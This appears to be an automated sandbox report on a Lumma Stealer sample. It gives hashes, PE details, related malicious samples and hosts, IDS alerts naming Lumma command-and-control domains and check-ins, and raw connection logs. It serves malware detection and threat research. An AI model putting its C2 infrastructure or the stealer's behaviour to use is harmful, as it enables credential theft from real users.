lev-tolstoi.com | uZO96rXyWt.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | Neverlose.cc.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | Launcher_x64.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | WonderHack.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | Launcher.exe | malicious | LummaC |
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      steamcommunity.comuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: AKAMAI-ASN1EU
  uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | • 23.55.153.106
  gVKsiQIHqe.exe | malicious | Vidar | • 23.44.201.28
  hAmnMk8afk.exe | malicious | LummaC | • 23.55.153.106
  EI3TafelpV.exe | malicious | LummaC | • 23.55.153.106
  6S7hoBEHvr.exe | malicious | LummaC | • 23.55.153.106
  uZO96rXyWt.exe | malicious | LummaC | • 23.55.153.106
  trZG6pItZj.exe | malicious | Vidar | • 23.209.72.32
  Neverlose.cc.exe | malicious | LummaC | • 23.55.153.106
  Launcher_x64.exe | malicious | LummaC | • 23.55.153.106
  WonderHack.exe | malicious | LummaC | • 23.55.153.106
Match: CLOUDFLARENETUS
  uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | • 104.21.66.86
  gVKsiQIHqe.exe | malicious | Vidar | • 172.64.41.3
  EI3TafelpV.exe | malicious | LummaC | • 172.67.157.254
  6S7hoBEHvr.exe | malicious | LummaC | • 172.67.157.254
  DHL AWB-documents.lnk | malicious | Divulge Stealer | • 162.159.138.232
  Rokadernes.vbs | malicious | Remcos, GuLoader | • 104.21.86.72
  uZO96rXyWt.exe | malicious | LummaC | • 104.21.66.86
  trZG6pItZj.exe | malicious | Vidar | • 172.64.41.3
  fKdiT1D1dk.exe | malicious | RHADAMANTHYS | • 104.16.249.249
  fKdiT1D1dk.exe | malicious | RHADAMANTHYS | • 104.16.248.249
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
  uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | • 172.67.157.254 • 23.55.153.106
  hAmnMk8afk.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  EI3TafelpV.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  6S7hoBEHvr.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  uZO96rXyWt.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  Echelon.exe | malicious | LummaC Stealer | • 172.67.157.254 • 23.55.153.106
  Neverlose.cc.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  bas.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  Wine.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
  Launcher_x64.exe | malicious | LummaC | • 172.67.157.254 • 23.55.153.106
                                                                                                                                                                                                                                                                      No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9697972037857133
Encrypted: false
SSDEEP: 192:7alnRa0HrndPF2jsFmmzuiFkZ24IO85ew:kRhHrnd4jgzuiFkY4IO8Aw
MD5: AE42BA527DA3EAC6927714120BDB8220
SHA1: E1F8837FE29CE8772B1CF6A012F2116E269958B7
SHA-256: E760CE8197E09179AE273C20E81D7461D1CD715A3E8AB3D95EA6D30361FEB88A
SHA-512: 993C57BC39E13B1B9CA9E8550D88F2E9EBE9235D6F02B256CA72C7180850A8AA0D079AF89EC5D879C8C51ABED560514344DB470D5FF112845A9120B7A45A5F11
Malicious: true
Reputation: low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.0.7.2.8.4.7.2.7.5.4.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.0.7.2.8.5.8.6.8.0.2.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.1.7.f.e.e.9.-.5.2.b.e.-.4.7.0.7.-.8.a.b.e.-.8.e.c.3.1.f.2.9.4.0.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.f.a.f.2.e.9.-.3.5.8.9.-.4.1.a.b.-.a.3.a.f.-.8.e.1.a.1.f.1.7.4.a.3.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.Q.b.g.5.H.t.2.h.W...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.7.0.-.0.0.0.1.-.0.0.1.4.-.0.4.5.f.-.6.d.1.3.0.0.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.a.c.c.9.3.0.7.9.5.c.4.7.7.3.2.a.2.8.2.0.8.1.d.b.a.2.5.1.d.c.b.0.0.0.0.f.f.f.f.!.0.0.0.0.2.a.9.1.9.e.2.a.2.c.d.0.2.b.7.b.4.3.3.4.3.2.6.0.2.f.5.d.7.4.0.3.4.f.b.a.f.f.c.4.!.N.Q.b.g.5.H.t.2.h.W...e.x.e.....T.a.r.g.e.t.A.p.p.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Dec 23 06:01:25 2024, 0x1205a4 type
Category: dropped
Size (bytes): 50618
Entropy (8bit): 2.716311138238793
Encrypted: false
SSDEEP: 192:vqAX7ZFKZ5wOp1B3DiQcjnnbRQfZGRb6qsMYcohONPjpHBZ5QdNZlpdOCs:iKFKP7BziQcboWnAyphbQdNZJps
MD5: 14FA67D649F969E92A9C2B70023E8DE1
SHA1: 82195D7613B4772EF4558E9AB0A8EA5BAE26E8F8
SHA-256: C839E44A5C8414507D7421C0701411CAF81228CFB1F911E6198BA84D4ED7249D
SHA-512: A48802E3A82977C35C0CD2EFF027B1F900DCD95A0DD2013BCFA458F872E9ACF43F7D29B1330715A5877CD11401CA5719CAC3B08CC1F560911F966D23DC52B2E2
Malicious: false
Reputation: low
Preview: MDMP..a..... .........hg............4...............H...................................`.......8...........T............@.......................... ..............................................................................eJ......L!......GenuineIntel............T.......p.....hg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8312
Entropy (8bit): 3.699284532317513
Encrypted: false
SSDEEP: 192:R6l7wVeJMja6J6YcDcSU93RJgmfWcGpDB89bcRsfeC0m:R6lXJ2a6J6YLSU9hJgmfWclcKfT
MD5: F5ECE5DA7728856B1255A8360794A0B1
SHA1: 548AC9A04FDD431854A6A1023CA668205503B277
SHA-256: 0969DEBF7CF7A8CC278A4D352D2BFDCC07A2266112FFBFC5408E5CA921CED448
SHA-512: 2070065F71A14DACBF208468A5ACDEB2AE4446EB268EB5755C28F34E28598C47D2B9E789AF86E0A0D5BFF19F6F84B1F0E2D0922E4E133337947D0DB3D336701F
Malicious: false
Reputation: low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.4.0.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4579
Entropy (8bit): 4.471324769940205
Encrypted: false
SSDEEP: 48:cvIwWl8zsnMJg77aI9bQWpW8VYoYm8M4JRK6cFRu+m+q8IJpXSQxBJz14JUd:uIjfnKI7Vp7VAJsmZS0JzmJUd
MD5: 7A6AF7FFEC3ACAF3308A6A4FE6EA0DAA
SHA1: 60FF5A5EECE3DB8EF168CECDAD1CDF5197698789
SHA-256: 5ED684C88D38102494321960D5D92556658A19650046BB7C61355A06C8513E9F
SHA-512: 78A4095851F1FDA661386B684DC22DC8D2A631EE9C09CDF91E1524A53C996573125883803C44CC2490529C6B623DF3F97907D57E16DB47EC8064E86C93684E03
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643504" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.393782715220416
Encrypted: false
SSDEEP: 6144:Jl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAWOBSqa:f4vF0MYQUMM6VFYSWU
MD5: 85829358ABC77746004C754338356665
SHA1: 454893B1039E42C66D076E9192ED8F5B9590AFBB
SHA-256: 2291826D0A36E4961F5E8B6C21233B9BADA14A875A340533FDA030DC99F70DFF
SHA-512: 7B265329D614BDF6531E08CD5696F657CB642F98A6E605E5472978AF55BB60D9A53E72E3DBC010ED4FA4501F8C234039D708FAED57CF1A4868C0BF2D6F501D32
Malicious: false
Reputation: low
Preview: regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Y...U..............................................................................................................................................................................................................................................................................................................................................D..-........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.380744581823742
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: NQbg5Ht2hW.exe
File size: 296'448 bytes
MD5: d1137063cca03f3d3079c8c4db839b95
SHA1: 2a919e2a2cd02b7b433432602f5d74034fbaffc4
SHA256: f91431bb0d797065ad6803c552059cad9b7d3b9bc695e29b1e666850376945ca
SHA512: 7b9bb0ffbb645fbc4103866ac2e6b6f99c24f8e9172a22ff357a5348915955d264b21696d6e510dbc57aef224111b4701b15f4648af6f2cd1db6584d33eceafc
SSDEEP: 3072:hBcrUsnHvSGL0cSky2MZmDNpPbSrY4mtjgGrcQTbQNWvuIh+89FfS8JVYb553f3W:45HvSGLfzQmDXF4mumQ2r1JVyv
TLSH: A054F11179A3C872C48BD5309560C7B1AF6B783267B5998B73981B7E5F302C3A73A709
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-,..-,..-,...,..-,...,..-,...,S.-,.)V,..-,..,,..-,...,..-,...,..-,...,..-,Rich..-,........................PE..L...`..d...
Icon Hash: 63396de961437e0f
Entrypoint: 0x404876
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x64C6BB60 [Sun Jul 30 19:34:56 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                      Import Hash:aa45dd407879e6b8355707382a3243fe
Instruction
call 00007FD2295207FEh
jmp 00007FD22951BDEDh
call 00007FD22951BFACh
xchg cl, ch
jmp 00007FD22951BF94h
call 00007FD22951BFA3h
fxch st(0), st(1)
jmp 00007FD22951BF8Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FD22951BF81h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FD22951BF76h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FD22951BF74h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FD22951BF77h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FD2295209CFh
fstp st(0)
fld tbyte ptr [00440BDAh]
ret
fstp st(0)
or cl, cl
je 00007FD22951BF7Dh
fstp st(0)
fldpi
or ch, ch
je 00007FD22951BF74h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FD22951BF69h
fchs
ret
fstp st(0)
jmp 00007FD2295209A5h
fstp st(0)
mov cl, ch
jmp 00007FD22951BF72h
call 00007FD22951BF3Eh
jmp 00007FD2295209B0h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, FFFFFD30h
push ebx
wait
fstcw word ptr [ebp+0000005Ch]
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x3edd0           0x28           .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x4b000           0x39d0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x0               0x0
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x2e68            0x40           .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x1000            0x18c          .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e6d8 | 0x3e800 | 72dec12620101750e7cd5b6507da7d47 | False | 0.87237890625 | data | 7.796934543809841 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0xabe8 | 0x6000 | de2ac8e19acb00a08914e765bf8af915 | False | 0.08186848958333333 | data | 0.9752363277723718 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4b000 | 0xa9d0 | 0x3a00 | c14df5d1dfda44c27a433b64ee973162 | False | 0.44558189655172414 | data | 3.9505950594415182 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4b1e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5368663594470046
RT_ICON | 0x4b1e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5368663594470046
RT_ICON | 0x4b8a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.40943983402489625
RT_ICON | 0x4b8a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.40943983402489625
RT_ICON | 0x4de50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.449468085106383
RT_ICON | 0x4de50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.449468085106383
RT_STRING | 0x4e538 | 0x496 | data | Tamil | India | 0.444633730834753
RT_STRING | 0x4e538 | 0x496 | data | Tamil | Sri Lanka | 0.444633730834753
RT_ACCELERATOR | 0x4e2e8 | 0x50 | data | Tamil | India | 0.825
RT_ACCELERATOR | 0x4e2e8 | 0x50 | data | Tamil | Sri Lanka | 0.825
RT_GROUP_ICON | 0x4e2b8 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x4e2b8 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_VERSION | 0x4e338 | 0x1fc | data | | | 0.5433070866141733
DLL | Import
KERNEL32.dll | WriteConsoleInputW, SetComputerNameExA, GetConsoleAliasExesLengthA, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, CopyFileW, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, GetCommMask, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, OpenEventW, SetCalendarInfoA, GetVersionExA, ReadConsoleInputW, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, SetFileAttributesW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapReAlloc, ReadFile, InitializeCriticalSectionAndSpinCount, RtlUnwind, RaiseException, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, CreateFileA
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T07:01:17.451107+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.9 | 57293 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:17.593871+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.9 | 49807 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:17.733544+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.9 | 62547 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:17.878639+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.9 | 54275 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:18.312820+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.9 | 57145 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:18.706968+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.9 | 55219 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:18.854285+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.9 | 63913 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:18.994329+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.9 | 62535 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:19.136590+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.9 | 63618 | 1.1.1.1 | 53 | UDP
2024-12-23T07:01:21.013322+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
2024-12-23T07:01:22.036909+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
2024-12-23T07:01:23.588702+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | TCP
2024-12-23T07:01:24.615424+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | TCP
2024-12-23T07:01:24.615424+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | TCP
2024-12-23T07:01:25.426775+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49739 | 172.67.157.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 07:01:19.508224964 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:19.508277893 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:19.508377075 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:19.526546955 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:19.526593924 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:21.013226032 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:21.013322115 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:21.036602974 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:21.036622047 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:21.037020922 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:21.082609892 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:21.344407082 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:21.387335062 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.036948919 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.036982059 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.037015915 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.037031889 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.037054062 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.037158012 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.037158012 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.037189007 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.037342072 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.185102940 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.185169935 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.185247898 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.185261965 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.185405970 CET | 49722 | 443 | 192.168.2.9 | 23.55.153.106
Dec 23, 2024 07:01:22.221376896 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
Dec 23, 2024 07:01:22.221431017 CET | 443 | 49722 | 23.55.153.106 | 192.168.2.9
